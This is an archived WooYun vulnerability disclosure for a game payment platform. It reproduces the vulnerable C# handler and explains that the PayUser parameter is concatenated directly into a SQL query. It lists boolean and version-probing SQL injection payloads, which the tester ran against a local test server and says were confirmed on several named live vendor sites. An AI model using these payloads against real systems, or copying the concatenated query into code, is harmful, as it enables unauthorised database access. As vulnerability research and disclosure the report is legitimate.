乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-03: 细节已通知厂商并且等待厂商处理中 2014-06-03: 厂商已经确认,细节仅向厂商公开 2014-06-06: 细节向第三方安全合作伙伴开放 2014-07-28: 细节向核心白帽子及相关领域专家公开 2014-08-07: 细节向普通白帽子公开 2014-08-17: 细节向实习白帽子公开 2014-09-01: 细节向公众公开
通用性注入
漏洞页面地址
api/payment/checkparams.ashx
源码如下
<%@ WebHandler Language="C#" Class="com.xykj.pay.checkparams" %>using System.Web;using System.Text;using System.Collections.Generic;using System.Linq;using System.Globalization;namespace com.xykj.pay{ /// <summary> /// 检查用户信息 /// </summary> public class checkparams : IHttpHandler { public void ProcessRequest(HttpContext context) { var param = context.Request.Params; var r = context.Response; var gid = param["GameId"];//游戏ID var sid = param["ServerId"];//服务器ID //r.Write("200"); //return; try { /*** 判断能否使用该充值方式 *******/ var NotAllow = new string[] { "gpay_epay_pay", "gpay_alipay_pay", "gpay_huanpay_pay", "gpay_shengpay_pay","gpay_eaypay_pay","gpay_huipay_pay", "gpay_xiuxian_pay","gpay_zhigame_pay","gpay_g265_pay","gpay_yeyou35_pay", "gpay_boof_pay"}; var payawy = param["PayAwy"].ToLower(); if (payawy.StartsWith("ty")) payawy = payawy.Substring(2); var payallow = ""; if (payawy.StartsWith("yee")) payallow = "gpay_epay_pay"; else if (payawy.StartsWith("pt0")) payallow = "gpay_shengpay_pay"; else if (payawy.StartsWith("epay")) payallow = "gpay_eaypay_pay"; else if (payawy.StartsWith("hf")) payallow = "gpay_huipay_pay"; else if (payawy.StartsWith("1073")) payallow = "gpay_xiuxian_pay"; else if (payawy.StartsWith("zhigame")) payallow = "gpay_zhigame_pay"; else if (payawy.StartsWith("alipay")) payallow = "gpay_alipay_pay"; else if (payawy.StartsWith("hx")) payallow = "gpay_huanpay_pay"; else if (payawy.StartsWith("g265")) payallow = "gpay_g265_pay"; else if (payawy.StartsWith("yeyou35")) payallow = "gpay_yeyou35_pay"; else if (payawy.StartsWith("boopay")) payallow = "gpay_boof_pay"; business.View.Games.Port _port = new business.View.Games.Port(); var obj = _port.GetPayType(gid); if (obj.Contains(payallow)) { r.Write(string.Format("游戏:{0},不能使用该充值方式,请选择其他充值方式!", param["GameName"])); return; } /**********/ /*** 参数检查 *********/ var useraccount = param["PayUser"]; //没处理 var user = new com.xykj.business.View.Account.Account().GetUserByAccount(useraccount); //跟进 if (user == null) { r.Write("用户不存在,请检查账户是否填写正确"); return; } if (user.State == (int)com.xykj.common.Enums.UserState.Delete) { r.Write("该用户被删除,已经不能登录,禁止充值"); return; } if (user.State == (int)com.xykj.common.Enums.UserState.Lock) { r.Write("该用户被锁定,暂时不能登录,禁止充值"); return; } if (user.State == (int)com.xykj.common.Enums.UserState.Loss) { r.Write("该用户已挂失,禁止充值"); return; } if (param["PayTo"] == "game") { var _game = new business.View.Games.Game(); var game = _game.GetGame(XY.ToInt(gid)); if (game.Count > 0) { if (!game[0].OnPay) { r.Write("该游戏被管理员设置为禁止充值状态"); return; } } else { r.Write("游戏编号错误,请选择游戏"); return; } var _server = new business.View.Games.Server(); var server = _server.GetServer(XY.ToInt(sid)); if (server == null) { r.Write("服务器编号错误,请重新选择服务器"); return; } if (server.OnPay == false) { r.Write("该游戏服被管理员设置为禁止充值状态"); return; } /*#*#*#*#**#*#*#*#*#**#*#*#*#*#**#*#*#*#*#**#*/ /*** 检查用户是否在游戏中创建角色 ***********/ var port = _port.GetPortByGameId(server.GameId); if (port == null) { r.Write("服务器未搭建完全,请稍后进行充值!"); return; } com.xykj.games.UserEngine _ge = new games.UserEngine(); var rest = _ge.PayGame(user, game[0], server, port, null); if (rest != "-255") { r.Write("您未在该服务器建立角色,请确认充值服务器!"); return; } /*#*#*#*#**#*#*#*#*#**#*#*#*#*#**#*#*#*#*#**#*/ } /************************************/ if (param["PayTo"] == "station") { if (param["PayAwy"] == "tystationpay") { r.Write("不能用 " + app.Setting("sys_station_moneyname") + " 充值 " + app.Setting("sys_station_moneyname")); return; } if (param["PayAwy"].StartsWith("ty1073")) { r.Write("休闲游戏充值方式,只能用作游戏充值!"); return; } } if ("tystationpay" == param["PayAwy"]) { var currency = new com.xykj.business.Currency().GetMoney(user.ID); if (currency == null || currency.CanCurrency < decimal.Parse(param["PayMoney"])) { r.Write(app.Setting("sys_station_moneyname") + "数量不足,请先充值" + app.Setting("sys_station_moneyname") + "!"); return; } var bseMoney = decimal.Parse(param["GetMoney"]); if (bseMoney < decimal.Parse("1.000")) { r.Write("可获金币少于 1 元,不能充值!"); return; } } var pay_setting_money = app.Setting("pay_setting_money").Split(new string[] { "\r\n", "\r", "\n" }, System.StringSplitOptions.RemoveEmptyEntries); var mns = new Dictionary<int, string>(); foreach (var item in pay_setting_money) { if (item.Length < 2) continue; var moneys = item.Split(new char[] { ':' }); mns.Add(XY.ToInt(moneys[0]), moneys[1]); } var pay_money = param["PayMoney"]; if (!mns.ContainsKey(XY.ToInt(pay_money)))//兑换的游戏币 { r.Write("充值金额错误,请选择正确的金额"); return; } r.Write("200"); } catch (System.Exception er) { context.Response.Write("系统<br/>" + er.Message); } } public bool IsReusable { get { return false; } } }}
public xy_users GetUserByAccount(string account){ XY.Cache.Delete(XY.MD5("select * from xy_users where Account='" + account + "'")); return this._user.GetUserByAccount(account); //没处理存在注入了}
漏洞证明先本地验证吧
http://192.168.1.108/api/payment/checkparams.ashx
提交
PayAwy=yee&gid=1&ServerId=2&PayUser=admin1
正常显示
PayAwy=yee&gid=1&ServerId=2&PayUser=admin1' and 1=1 --
PayAwy=yee&gid=1&ServerId=2&PayUser=admin1' and 1=2 --
PayAwy=yee&gid=1&ServerId=2&PayUser=admin1' and (select @@version)>0--
下面测试官网几套代码 由于有安全狗 这里只证明存在注入了第一套
http://xy001.52xinyou.cn/
第二套
http://xy002.52xinyou.cn/
第三套
http://xy003.52xinyou.cn
第四套
http://xy006.52xinyou.cn
可证明存在注入 但是有安全狗 不好进一步验证了 漏洞确实存在
对这个文件里的参数在进一步的处理吧
危害等级:高
漏洞Rank:15
确认时间:2014-06-03 12:14
非常感激 已经安排修复 感谢各位白帽子 不断挖掘问题 让系统越来越完善
暂无